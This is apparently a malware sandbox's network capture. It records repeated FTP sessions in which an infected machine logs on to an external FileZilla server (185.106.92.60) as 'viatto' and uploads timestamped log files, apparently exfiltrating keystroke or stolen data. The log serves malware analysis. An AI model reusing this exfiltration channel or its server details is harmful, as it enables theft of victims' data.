                                                                                                                                    Oct 10, 2022 06:02:39.887187958 CEST4980121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.50.txt
                                                                                                                                    Oct 10, 2022 06:02:39.913005114 CEST2149801185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:39.941009998 CEST2149801185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:40.159416914 CEST2149803185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:40.159452915 CEST2149803185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:40.159467936 CEST2149803185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:40.159914970 CEST4980321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:40.184278965 CEST2149803185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:40.184686899 CEST4980321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:40.209424973 CEST2149803185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:40.209800959 CEST4980321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:40.234658003 CEST2149803185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:40.235100985 CEST4980321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:40.259733915 CEST2149803185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:40.261419058 CEST4980321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:40.291527033 CEST2149803185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:40.293529034 CEST4980321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:40.318017960 CEST2149803185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,55)
                                                                                                                                    Oct 10, 2022 06:02:40.343009949 CEST4980321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.51.txt
                                                                                                                                    Oct 10, 2022 06:02:40.368027925 CEST2149803185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:40.393338919 CEST2149803185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:40.618246078 CEST2149805185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:40.618303061 CEST2149805185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:40.618396044 CEST2149805185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:40.618660927 CEST4980521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:40.643047094 CEST2149805185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:40.643330097 CEST4980521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:40.667948961 CEST2149805185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:40.670141935 CEST4980521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:40.695369959 CEST2149805185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:40.695669889 CEST4980521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:40.721612930 CEST2149805185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:40.731815100 CEST4980521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:40.757725000 CEST2149805185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:40.758783102 CEST4980521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:40.782988071 CEST2149805185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,56)
                                                                                                                                    Oct 10, 2022 06:02:40.807780027 CEST4980521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.52.txt
                                                                                                                                    Oct 10, 2022 06:02:40.832684040 CEST2149805185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:40.860390902 CEST2149805185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:41.109267950 CEST2149807185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:41.109321117 CEST2149807185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:41.109355927 CEST2149807185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:41.109715939 CEST4980721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:41.137773991 CEST2149807185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:41.138036966 CEST4980721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:41.164223909 CEST2149807185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:41.164535999 CEST4980721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:41.191442966 CEST2149807185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:41.192173004 CEST4980721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:41.218652964 CEST2149807185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:41.219311953 CEST4980721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:41.245652914 CEST2149807185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:41.247291088 CEST4980721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:41.275346041 CEST2149807185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,57)
                                                                                                                                    Oct 10, 2022 06:02:41.300324917 CEST4980721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.53.txt
                                                                                                                                    Oct 10, 2022 06:02:41.327559948 CEST2149807185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:41.354079962 CEST2149807185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:41.569778919 CEST2149809185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:41.569909096 CEST2149809185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:41.569977045 CEST2149809185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:41.570363045 CEST4980921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:41.596563101 CEST2149809185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:41.599570036 CEST4980921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:41.623761892 CEST2149809185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:41.626744032 CEST4980921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:41.653234005 CEST2149809185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:41.655153990 CEST4980921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:41.681121111 CEST2149809185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:41.683360100 CEST4980921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:41.708048105 CEST2149809185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:41.714972019 CEST4980921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:41.741511106 CEST2149809185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,58)
                                                                                                                                    Oct 10, 2022 06:02:41.765918016 CEST4980921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.54.txt
                                                                                                                                    Oct 10, 2022 06:02:41.796158075 CEST2149809185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:41.824877024 CEST2149809185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:42.063823938 CEST2149811185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:42.063899040 CEST2149811185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:42.063930035 CEST2149811185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:42.064517975 CEST4981121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:42.087198019 CEST2149811185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:42.087728977 CEST4981121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:42.110472918 CEST2149811185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:42.111511946 CEST4981121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:42.135133982 CEST2149811185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:42.144129992 CEST4981121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:42.167795897 CEST2149811185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:42.168450117 CEST4981121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:42.191103935 CEST2149811185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:42.193418026 CEST4981121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:42.216571093 CEST2149811185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,60)
                                                                                                                                    Oct 10, 2022 06:02:42.242854118 CEST4981121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.55.txt
                                                                                                                                    Oct 10, 2022 06:02:42.268162012 CEST2149811185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:42.293997049 CEST2149811185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:42.487421036 CEST2149813185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:42.487473011 CEST2149813185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:42.487512112 CEST2149813185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:42.487895966 CEST4981321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:42.513267994 CEST2149813185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:42.513614893 CEST4981321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:42.539134026 CEST2149813185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:42.541121006 CEST4981321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:42.567553997 CEST2149813185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:42.567800045 CEST4981321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:42.595582008 CEST2149813185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:42.597135067 CEST4981321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:42.624211073 CEST2149813185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:42.625473976 CEST4981321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:42.651922941 CEST2149813185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,61)
                                                                                                                                    Oct 10, 2022 06:02:42.677685022 CEST4981321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.56.txt
                                                                                                                                    Oct 10, 2022 06:02:42.705373049 CEST2149813185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:42.735553026 CEST2149813185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:42.912198067 CEST2149815185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:42.912272930 CEST2149815185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:42.912497044 CEST2149815185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:42.912703037 CEST4981521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:42.935904980 CEST2149815185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:42.936211109 CEST4981521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:42.959878922 CEST2149815185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:42.960331917 CEST4981521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:42.983278990 CEST2149815185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:42.983829975 CEST4981521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:43.007255077 CEST2149815185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:43.008136034 CEST4981521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:43.031322002 CEST2149815185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:43.054985046 CEST4981521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:43.079026937 CEST2149815185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,62)
                                                                                                                                    Oct 10, 2022 06:02:43.107222080 CEST4981521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.57.txt
                                                                                                                                    Oct 10, 2022 06:02:43.131665945 CEST2149815185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:43.159756899 CEST2149815185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:43.353720903 CEST2149817185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:43.353804111 CEST2149817185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:43.353920937 CEST2149817185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:43.354187965 CEST4981721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:43.378582001 CEST2149817185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:43.378812075 CEST4981721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:43.435987949 CEST2149817185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:43.436243057 CEST4981721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:43.460880041 CEST2149817185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:43.461141109 CEST4981721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:43.485513926 CEST2149817185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:43.486064911 CEST4981721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:43.510400057 CEST2149817185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:43.512634993 CEST4981721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:43.537344933 CEST2149817185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,63)
                                                                                                                                    Oct 10, 2022 06:02:43.563335896 CEST4981721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.58.txt
                                                                                                                                    Oct 10, 2022 06:02:43.588567972 CEST2149817185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:43.614078045 CEST2149817185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:43.810986996 CEST2149819185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:43.811039925 CEST2149819185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:43.811073065 CEST2149819185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:43.811357021 CEST4981921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:43.835815907 CEST2149819185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:43.836221933 CEST4981921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:43.859904051 CEST2149819185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:43.864624977 CEST4981921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:43.889187098 CEST2149819185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:43.890650034 CEST4981921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:43.914772987 CEST2149819185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:43.915416002 CEST4981921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:43.939260006 CEST2149819185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:43.940349102 CEST4981921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:43.965512991 CEST2149819185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,64)
                                                                                                                                    Oct 10, 2022 06:02:43.989512920 CEST4981921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_06.59.txt
                                                                                                                                    Oct 10, 2022 06:02:44.013617039 CEST2149819185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:44.037533998 CEST2149819185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:44.235219955 CEST2149821185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:44.235280991 CEST2149821185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:44.235517979 CEST2149821185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:44.235974073 CEST4982121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:44.259345055 CEST2149821185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:44.259772062 CEST4982121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:44.282490969 CEST2149821185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:44.283109903 CEST4982121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:44.306058884 CEST2149821185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:44.306684971 CEST4982121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:44.329652071 CEST2149821185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:44.330324888 CEST4982121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:44.352972031 CEST2149821185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:44.354415894 CEST4982121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:44.377429962 CEST2149821185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,66)
                                                                                                                                    Oct 10, 2022 06:02:44.404473066 CEST4982121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.00.txt
                                                                                                                                    Oct 10, 2022 06:02:44.427429914 CEST2149821185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:44.452234030 CEST2149821185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:44.640980959 CEST2149823185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:44.641035080 CEST2149823185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:44.641084909 CEST2149823185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:44.641531944 CEST4982321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:44.666435003 CEST2149823185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:44.674918890 CEST4982321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:44.700181007 CEST2149823185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:44.700474024 CEST4982321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:44.725761890 CEST2149823185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:44.726260900 CEST4982321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:44.759330034 CEST2149823185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:44.761794090 CEST4982321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:44.786695004 CEST2149823185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:44.796587944 CEST4982321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:44.822503090 CEST2149823185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,67)
                                                                                                                                    Oct 10, 2022 06:02:44.850931883 CEST4982321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.01.txt
                                                                                                                                    Oct 10, 2022 06:02:44.877836943 CEST2149823185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:44.909399033 CEST2149823185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:45.149410963 CEST2149825185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:45.149487972 CEST2149825185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:45.149521112 CEST2149825185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:45.150082111 CEST4982521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:45.174909115 CEST2149825185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:45.177341938 CEST4982521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:45.203219891 CEST2149825185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:45.217294931 CEST4982521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:45.242188931 CEST2149825185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:45.245377064 CEST4982521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:45.270766973 CEST2149825185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:45.271661043 CEST4982521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:45.296742916 CEST2149825185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:45.300302029 CEST4982521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:45.326251984 CEST2149825185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,68)
                                                                                                                                    Oct 10, 2022 06:02:45.353147030 CEST4982521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.02.txt
                                                                                                                                    Oct 10, 2022 06:02:45.378237009 CEST2149825185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:45.407299042 CEST2149825185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:45.612479925 CEST2149827185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:45.612543106 CEST2149827185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:45.612564087 CEST2149827185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:45.612900972 CEST4982721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:45.636058092 CEST2149827185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:45.642865896 CEST4982721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:45.666054964 CEST2149827185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:02:45.666336060 CEST4982721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:02:45.689239025 CEST2149827185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:02:45.689462900 CEST4982721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:02:45.712707043 CEST2149827185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:02:45.713669062 CEST4982721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:02:45.736375093 CEST2149827185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:02:45.738843918 CEST4982721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:02:45.762361050 CEST2149827185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,69)
                                                                                                                                    Oct 10, 2022 06:02:45.787090063 CEST4982721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.03.txt
                                                                                                                                    Oct 10, 2022 06:02:45.887569904 CEST2149827185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:02:45.913106918 CEST2149827185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:02:46.116816998 CEST2149829185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:02:46.116871119 CEST2149829185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:02:46.117578983 CEST2149829185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:02:46.117722034 CEST4982921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:02:46.141066074 CEST2149829185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:02:46.141333103 CEST4982921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:02:46.164885998 CEST2149829185.106.92.60192.168.2.3230 Logged on
